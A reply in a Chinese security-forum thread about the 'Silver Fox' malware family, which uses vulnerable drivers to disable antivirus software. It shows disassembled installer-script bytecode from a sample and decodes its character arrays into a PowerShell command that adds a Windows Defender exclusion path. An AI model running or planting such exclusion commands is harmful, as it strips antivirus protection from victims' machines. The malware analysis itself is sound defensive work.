首页| 论坛| 搜索| 消息
> 〖系统安全〗
主题:持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件
回帖:7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype Type30 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype S32 ; StackCount = 9assign Var9, S32(1)pushvar Var8 ; StackCount = 10call SETARRAYLENGTHpop ; StackCount = 9pop ; StackCount = 8assign Var8[0], S32(39)assign Var7, Var8pop ; StackCount = 7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype Type30 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype S32 ; StackCount = 9assign Var9, S32(1)pushvar Var8 ; StackCount = 10call SETARRAYLENGTHpop ; StackCount = 9pop ; StackCount = 8assign Var8[0], S32(44)assign Var7, Var8pop ; StackCount = 7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5assign Var4, Var5pop ; StackCount = 4pushtype WideString ; StackCount = 5assign Var5, Var4pushtype UnicodeString_2 ; StackCount = 6pushtype Type30 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype S32 ; StackCount = 9assign Var9, S32(1)pushvar Var8 ; StackCount = 10call SETARRAYLENGTHpop ; StackCount = 9pop ; StackCount = 8assign Var8[0], S32(32)assign Var7, Var8pop ; StackCount = 7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5assign Var4, Var5pop ; StackCount = 4pushtype WideString ; StackCount = 5assign Var5, Var4pushtype UnicodeString_2 ; StackCount = 6pushtype Type30 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype S32 ; StackCount = 9assign Var9, S32(1)pushvar Var8 ; StackCount = 10call SETARRAYLENGTHpop ; StackCount = 9pop ; StackCount = 8assign Var8[0], S32(39)assign Var7, Var8pop ; StackCount = 7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype Type30 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype S32 ; StackCount = 9assign Var9, S32(13)pushvar Var8 ; StackCount = 10call SETARRAYLENGTHpop ; StackCount = 9pop ; StackCount = 8assign Var8[0], S32(67)assign Var8[1], S32(58)assign Var8[2], S32(92)assign Var8[3], S32(67)assign Var8[4], S32(110)assign Var8[5], S32(100)assign Var8[6], S32(111)assign Var8[7], S32(109)assign Var8[8], S32(54)assign Var8[9], S32(46)assign Var8[10], S32(115)assign Var8[11], S32(121)assign Var8[12], S32(115)assign Var7, Var8pop ; StackCount = 7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype Type30 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype S32 ; StackCount = 9assign Var9, S32(1)pushvar Var8 ; StackCount = 10call SETARRAYLENGTHpop ; StackCount = 9pop ; StackCount = 8assign Var8[0], S32(39)assign Var7, Var8pop ; StackCount = 7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype Type30 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype S32 ; StackCount = 9assign Var9, S32(1)pushvar Var8 ; StackCount = 10call SETARRAYLENGTHpop ; StackCount = 9pop ; StackCount = 8assign Var8[0], S32(34)assign Var7, Var8pop ; StackCount = 7pushvar Var6 ; StackCount = 8call STRFROMCODEpop ; StackCount = 7pop ; StackCount = 6add Var5, Var6pop ; StackCount = 5assign Var4, Var5pop ; StackCount = 4pushtype BOOLEAN ; StackCount = 5pushtype Pointer ; StackCount = 6setptr Var6, Var1pushtype U8_4 ; StackCount = 7assign Var7, U8_4(1)pushtype S32 ; StackCount = 8assign Var8, S32(0)pushtype UnicodeString_2 ; StackCount = 9assign Var9, String_3("")pushtype UnicodeString_2 ; StackCount = 10pushtype WideString ; StackCount = 11assign Var11, Var3pushtype UnicodeString_2 ; StackCount = 12pushtype Type30 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype S32 ; StackCount = 15assign Var15, S32(1)pushvar Var14 ; StackCount = 16call SETARRAYLENGTHpop ; StackCount = 15pop ; StackCount = 14assign Var14[0], S32(32)assign Var13, Var14pop ; StackCount = 13pushvar Var12 ; StackCount = 14call STRFROMCODEpop ; StackCount = 13pop ; StackCount = 12add Var11, Var12pop ; StackCount = 11add Var11, Var4assign Var10, Var11pop ; StackCount = 10pushtype UnicodeString_2 ; StackCount = 11assign Var11, Var2pushvar Var5 ; StackCount = 12call EXECpop ; StackCount = 11pop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7pop ; StackCount = 6pop ; StackCount = 5pop ; StackCount = 4pushtype S32 ; StackCount = 5assign Var5, S32(4000)call SLEEPpop ; StackCount = 4loc_ead:ret

以下是所有ASCII码数组的还原结果:

第一个数组(14字节)ASCII码:112, 111, 119, 101, 114, 115, 104, 101, 108, 108, 46, 101, 120, 101字符串:"powershell.exe"

第二个数组(8字节)ASCII码:45, 67, 111, 109, 109, 97, 110, 100字符串:"-Command"

第三个数组(1字节)ASCII码:34字符串:"""

第四个数组(16字节)ASCII码:65, 100, 100, 45, 77, 112, 80, 114, 101, 102, 101, 114, 101, 110, 99, 101字符串:"Add-MpPreference"

第五个数组(1字节)ASCII码:32字符串:" "

第六个数组(14字节)ASCII码:45, 69, 120, 99, 108, 117, 115, 105, 111, 110, 80, 97, 116, 104字符串:"-ExclusionPath"

第七个数组(1字节)ASCII码:32字符串:" "

第八个数组(1字节)ASCII码:39字符串:"'"

第九个数组(25字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115字符串:"C:UsersPublicDocuments"

第十个数组(1字节)ASCII码:39字符串:"'"

第十一个数组(1字节)ASCII码:44字符串:","

第十二个数组(1字节)ASCII码:32字符串:" "
z3960回帖于2026-02-21 07:50
下一页上一页  (6/17)
下一楼›:来看看看(huwg)

查看全部回帖(7)
«返回主帖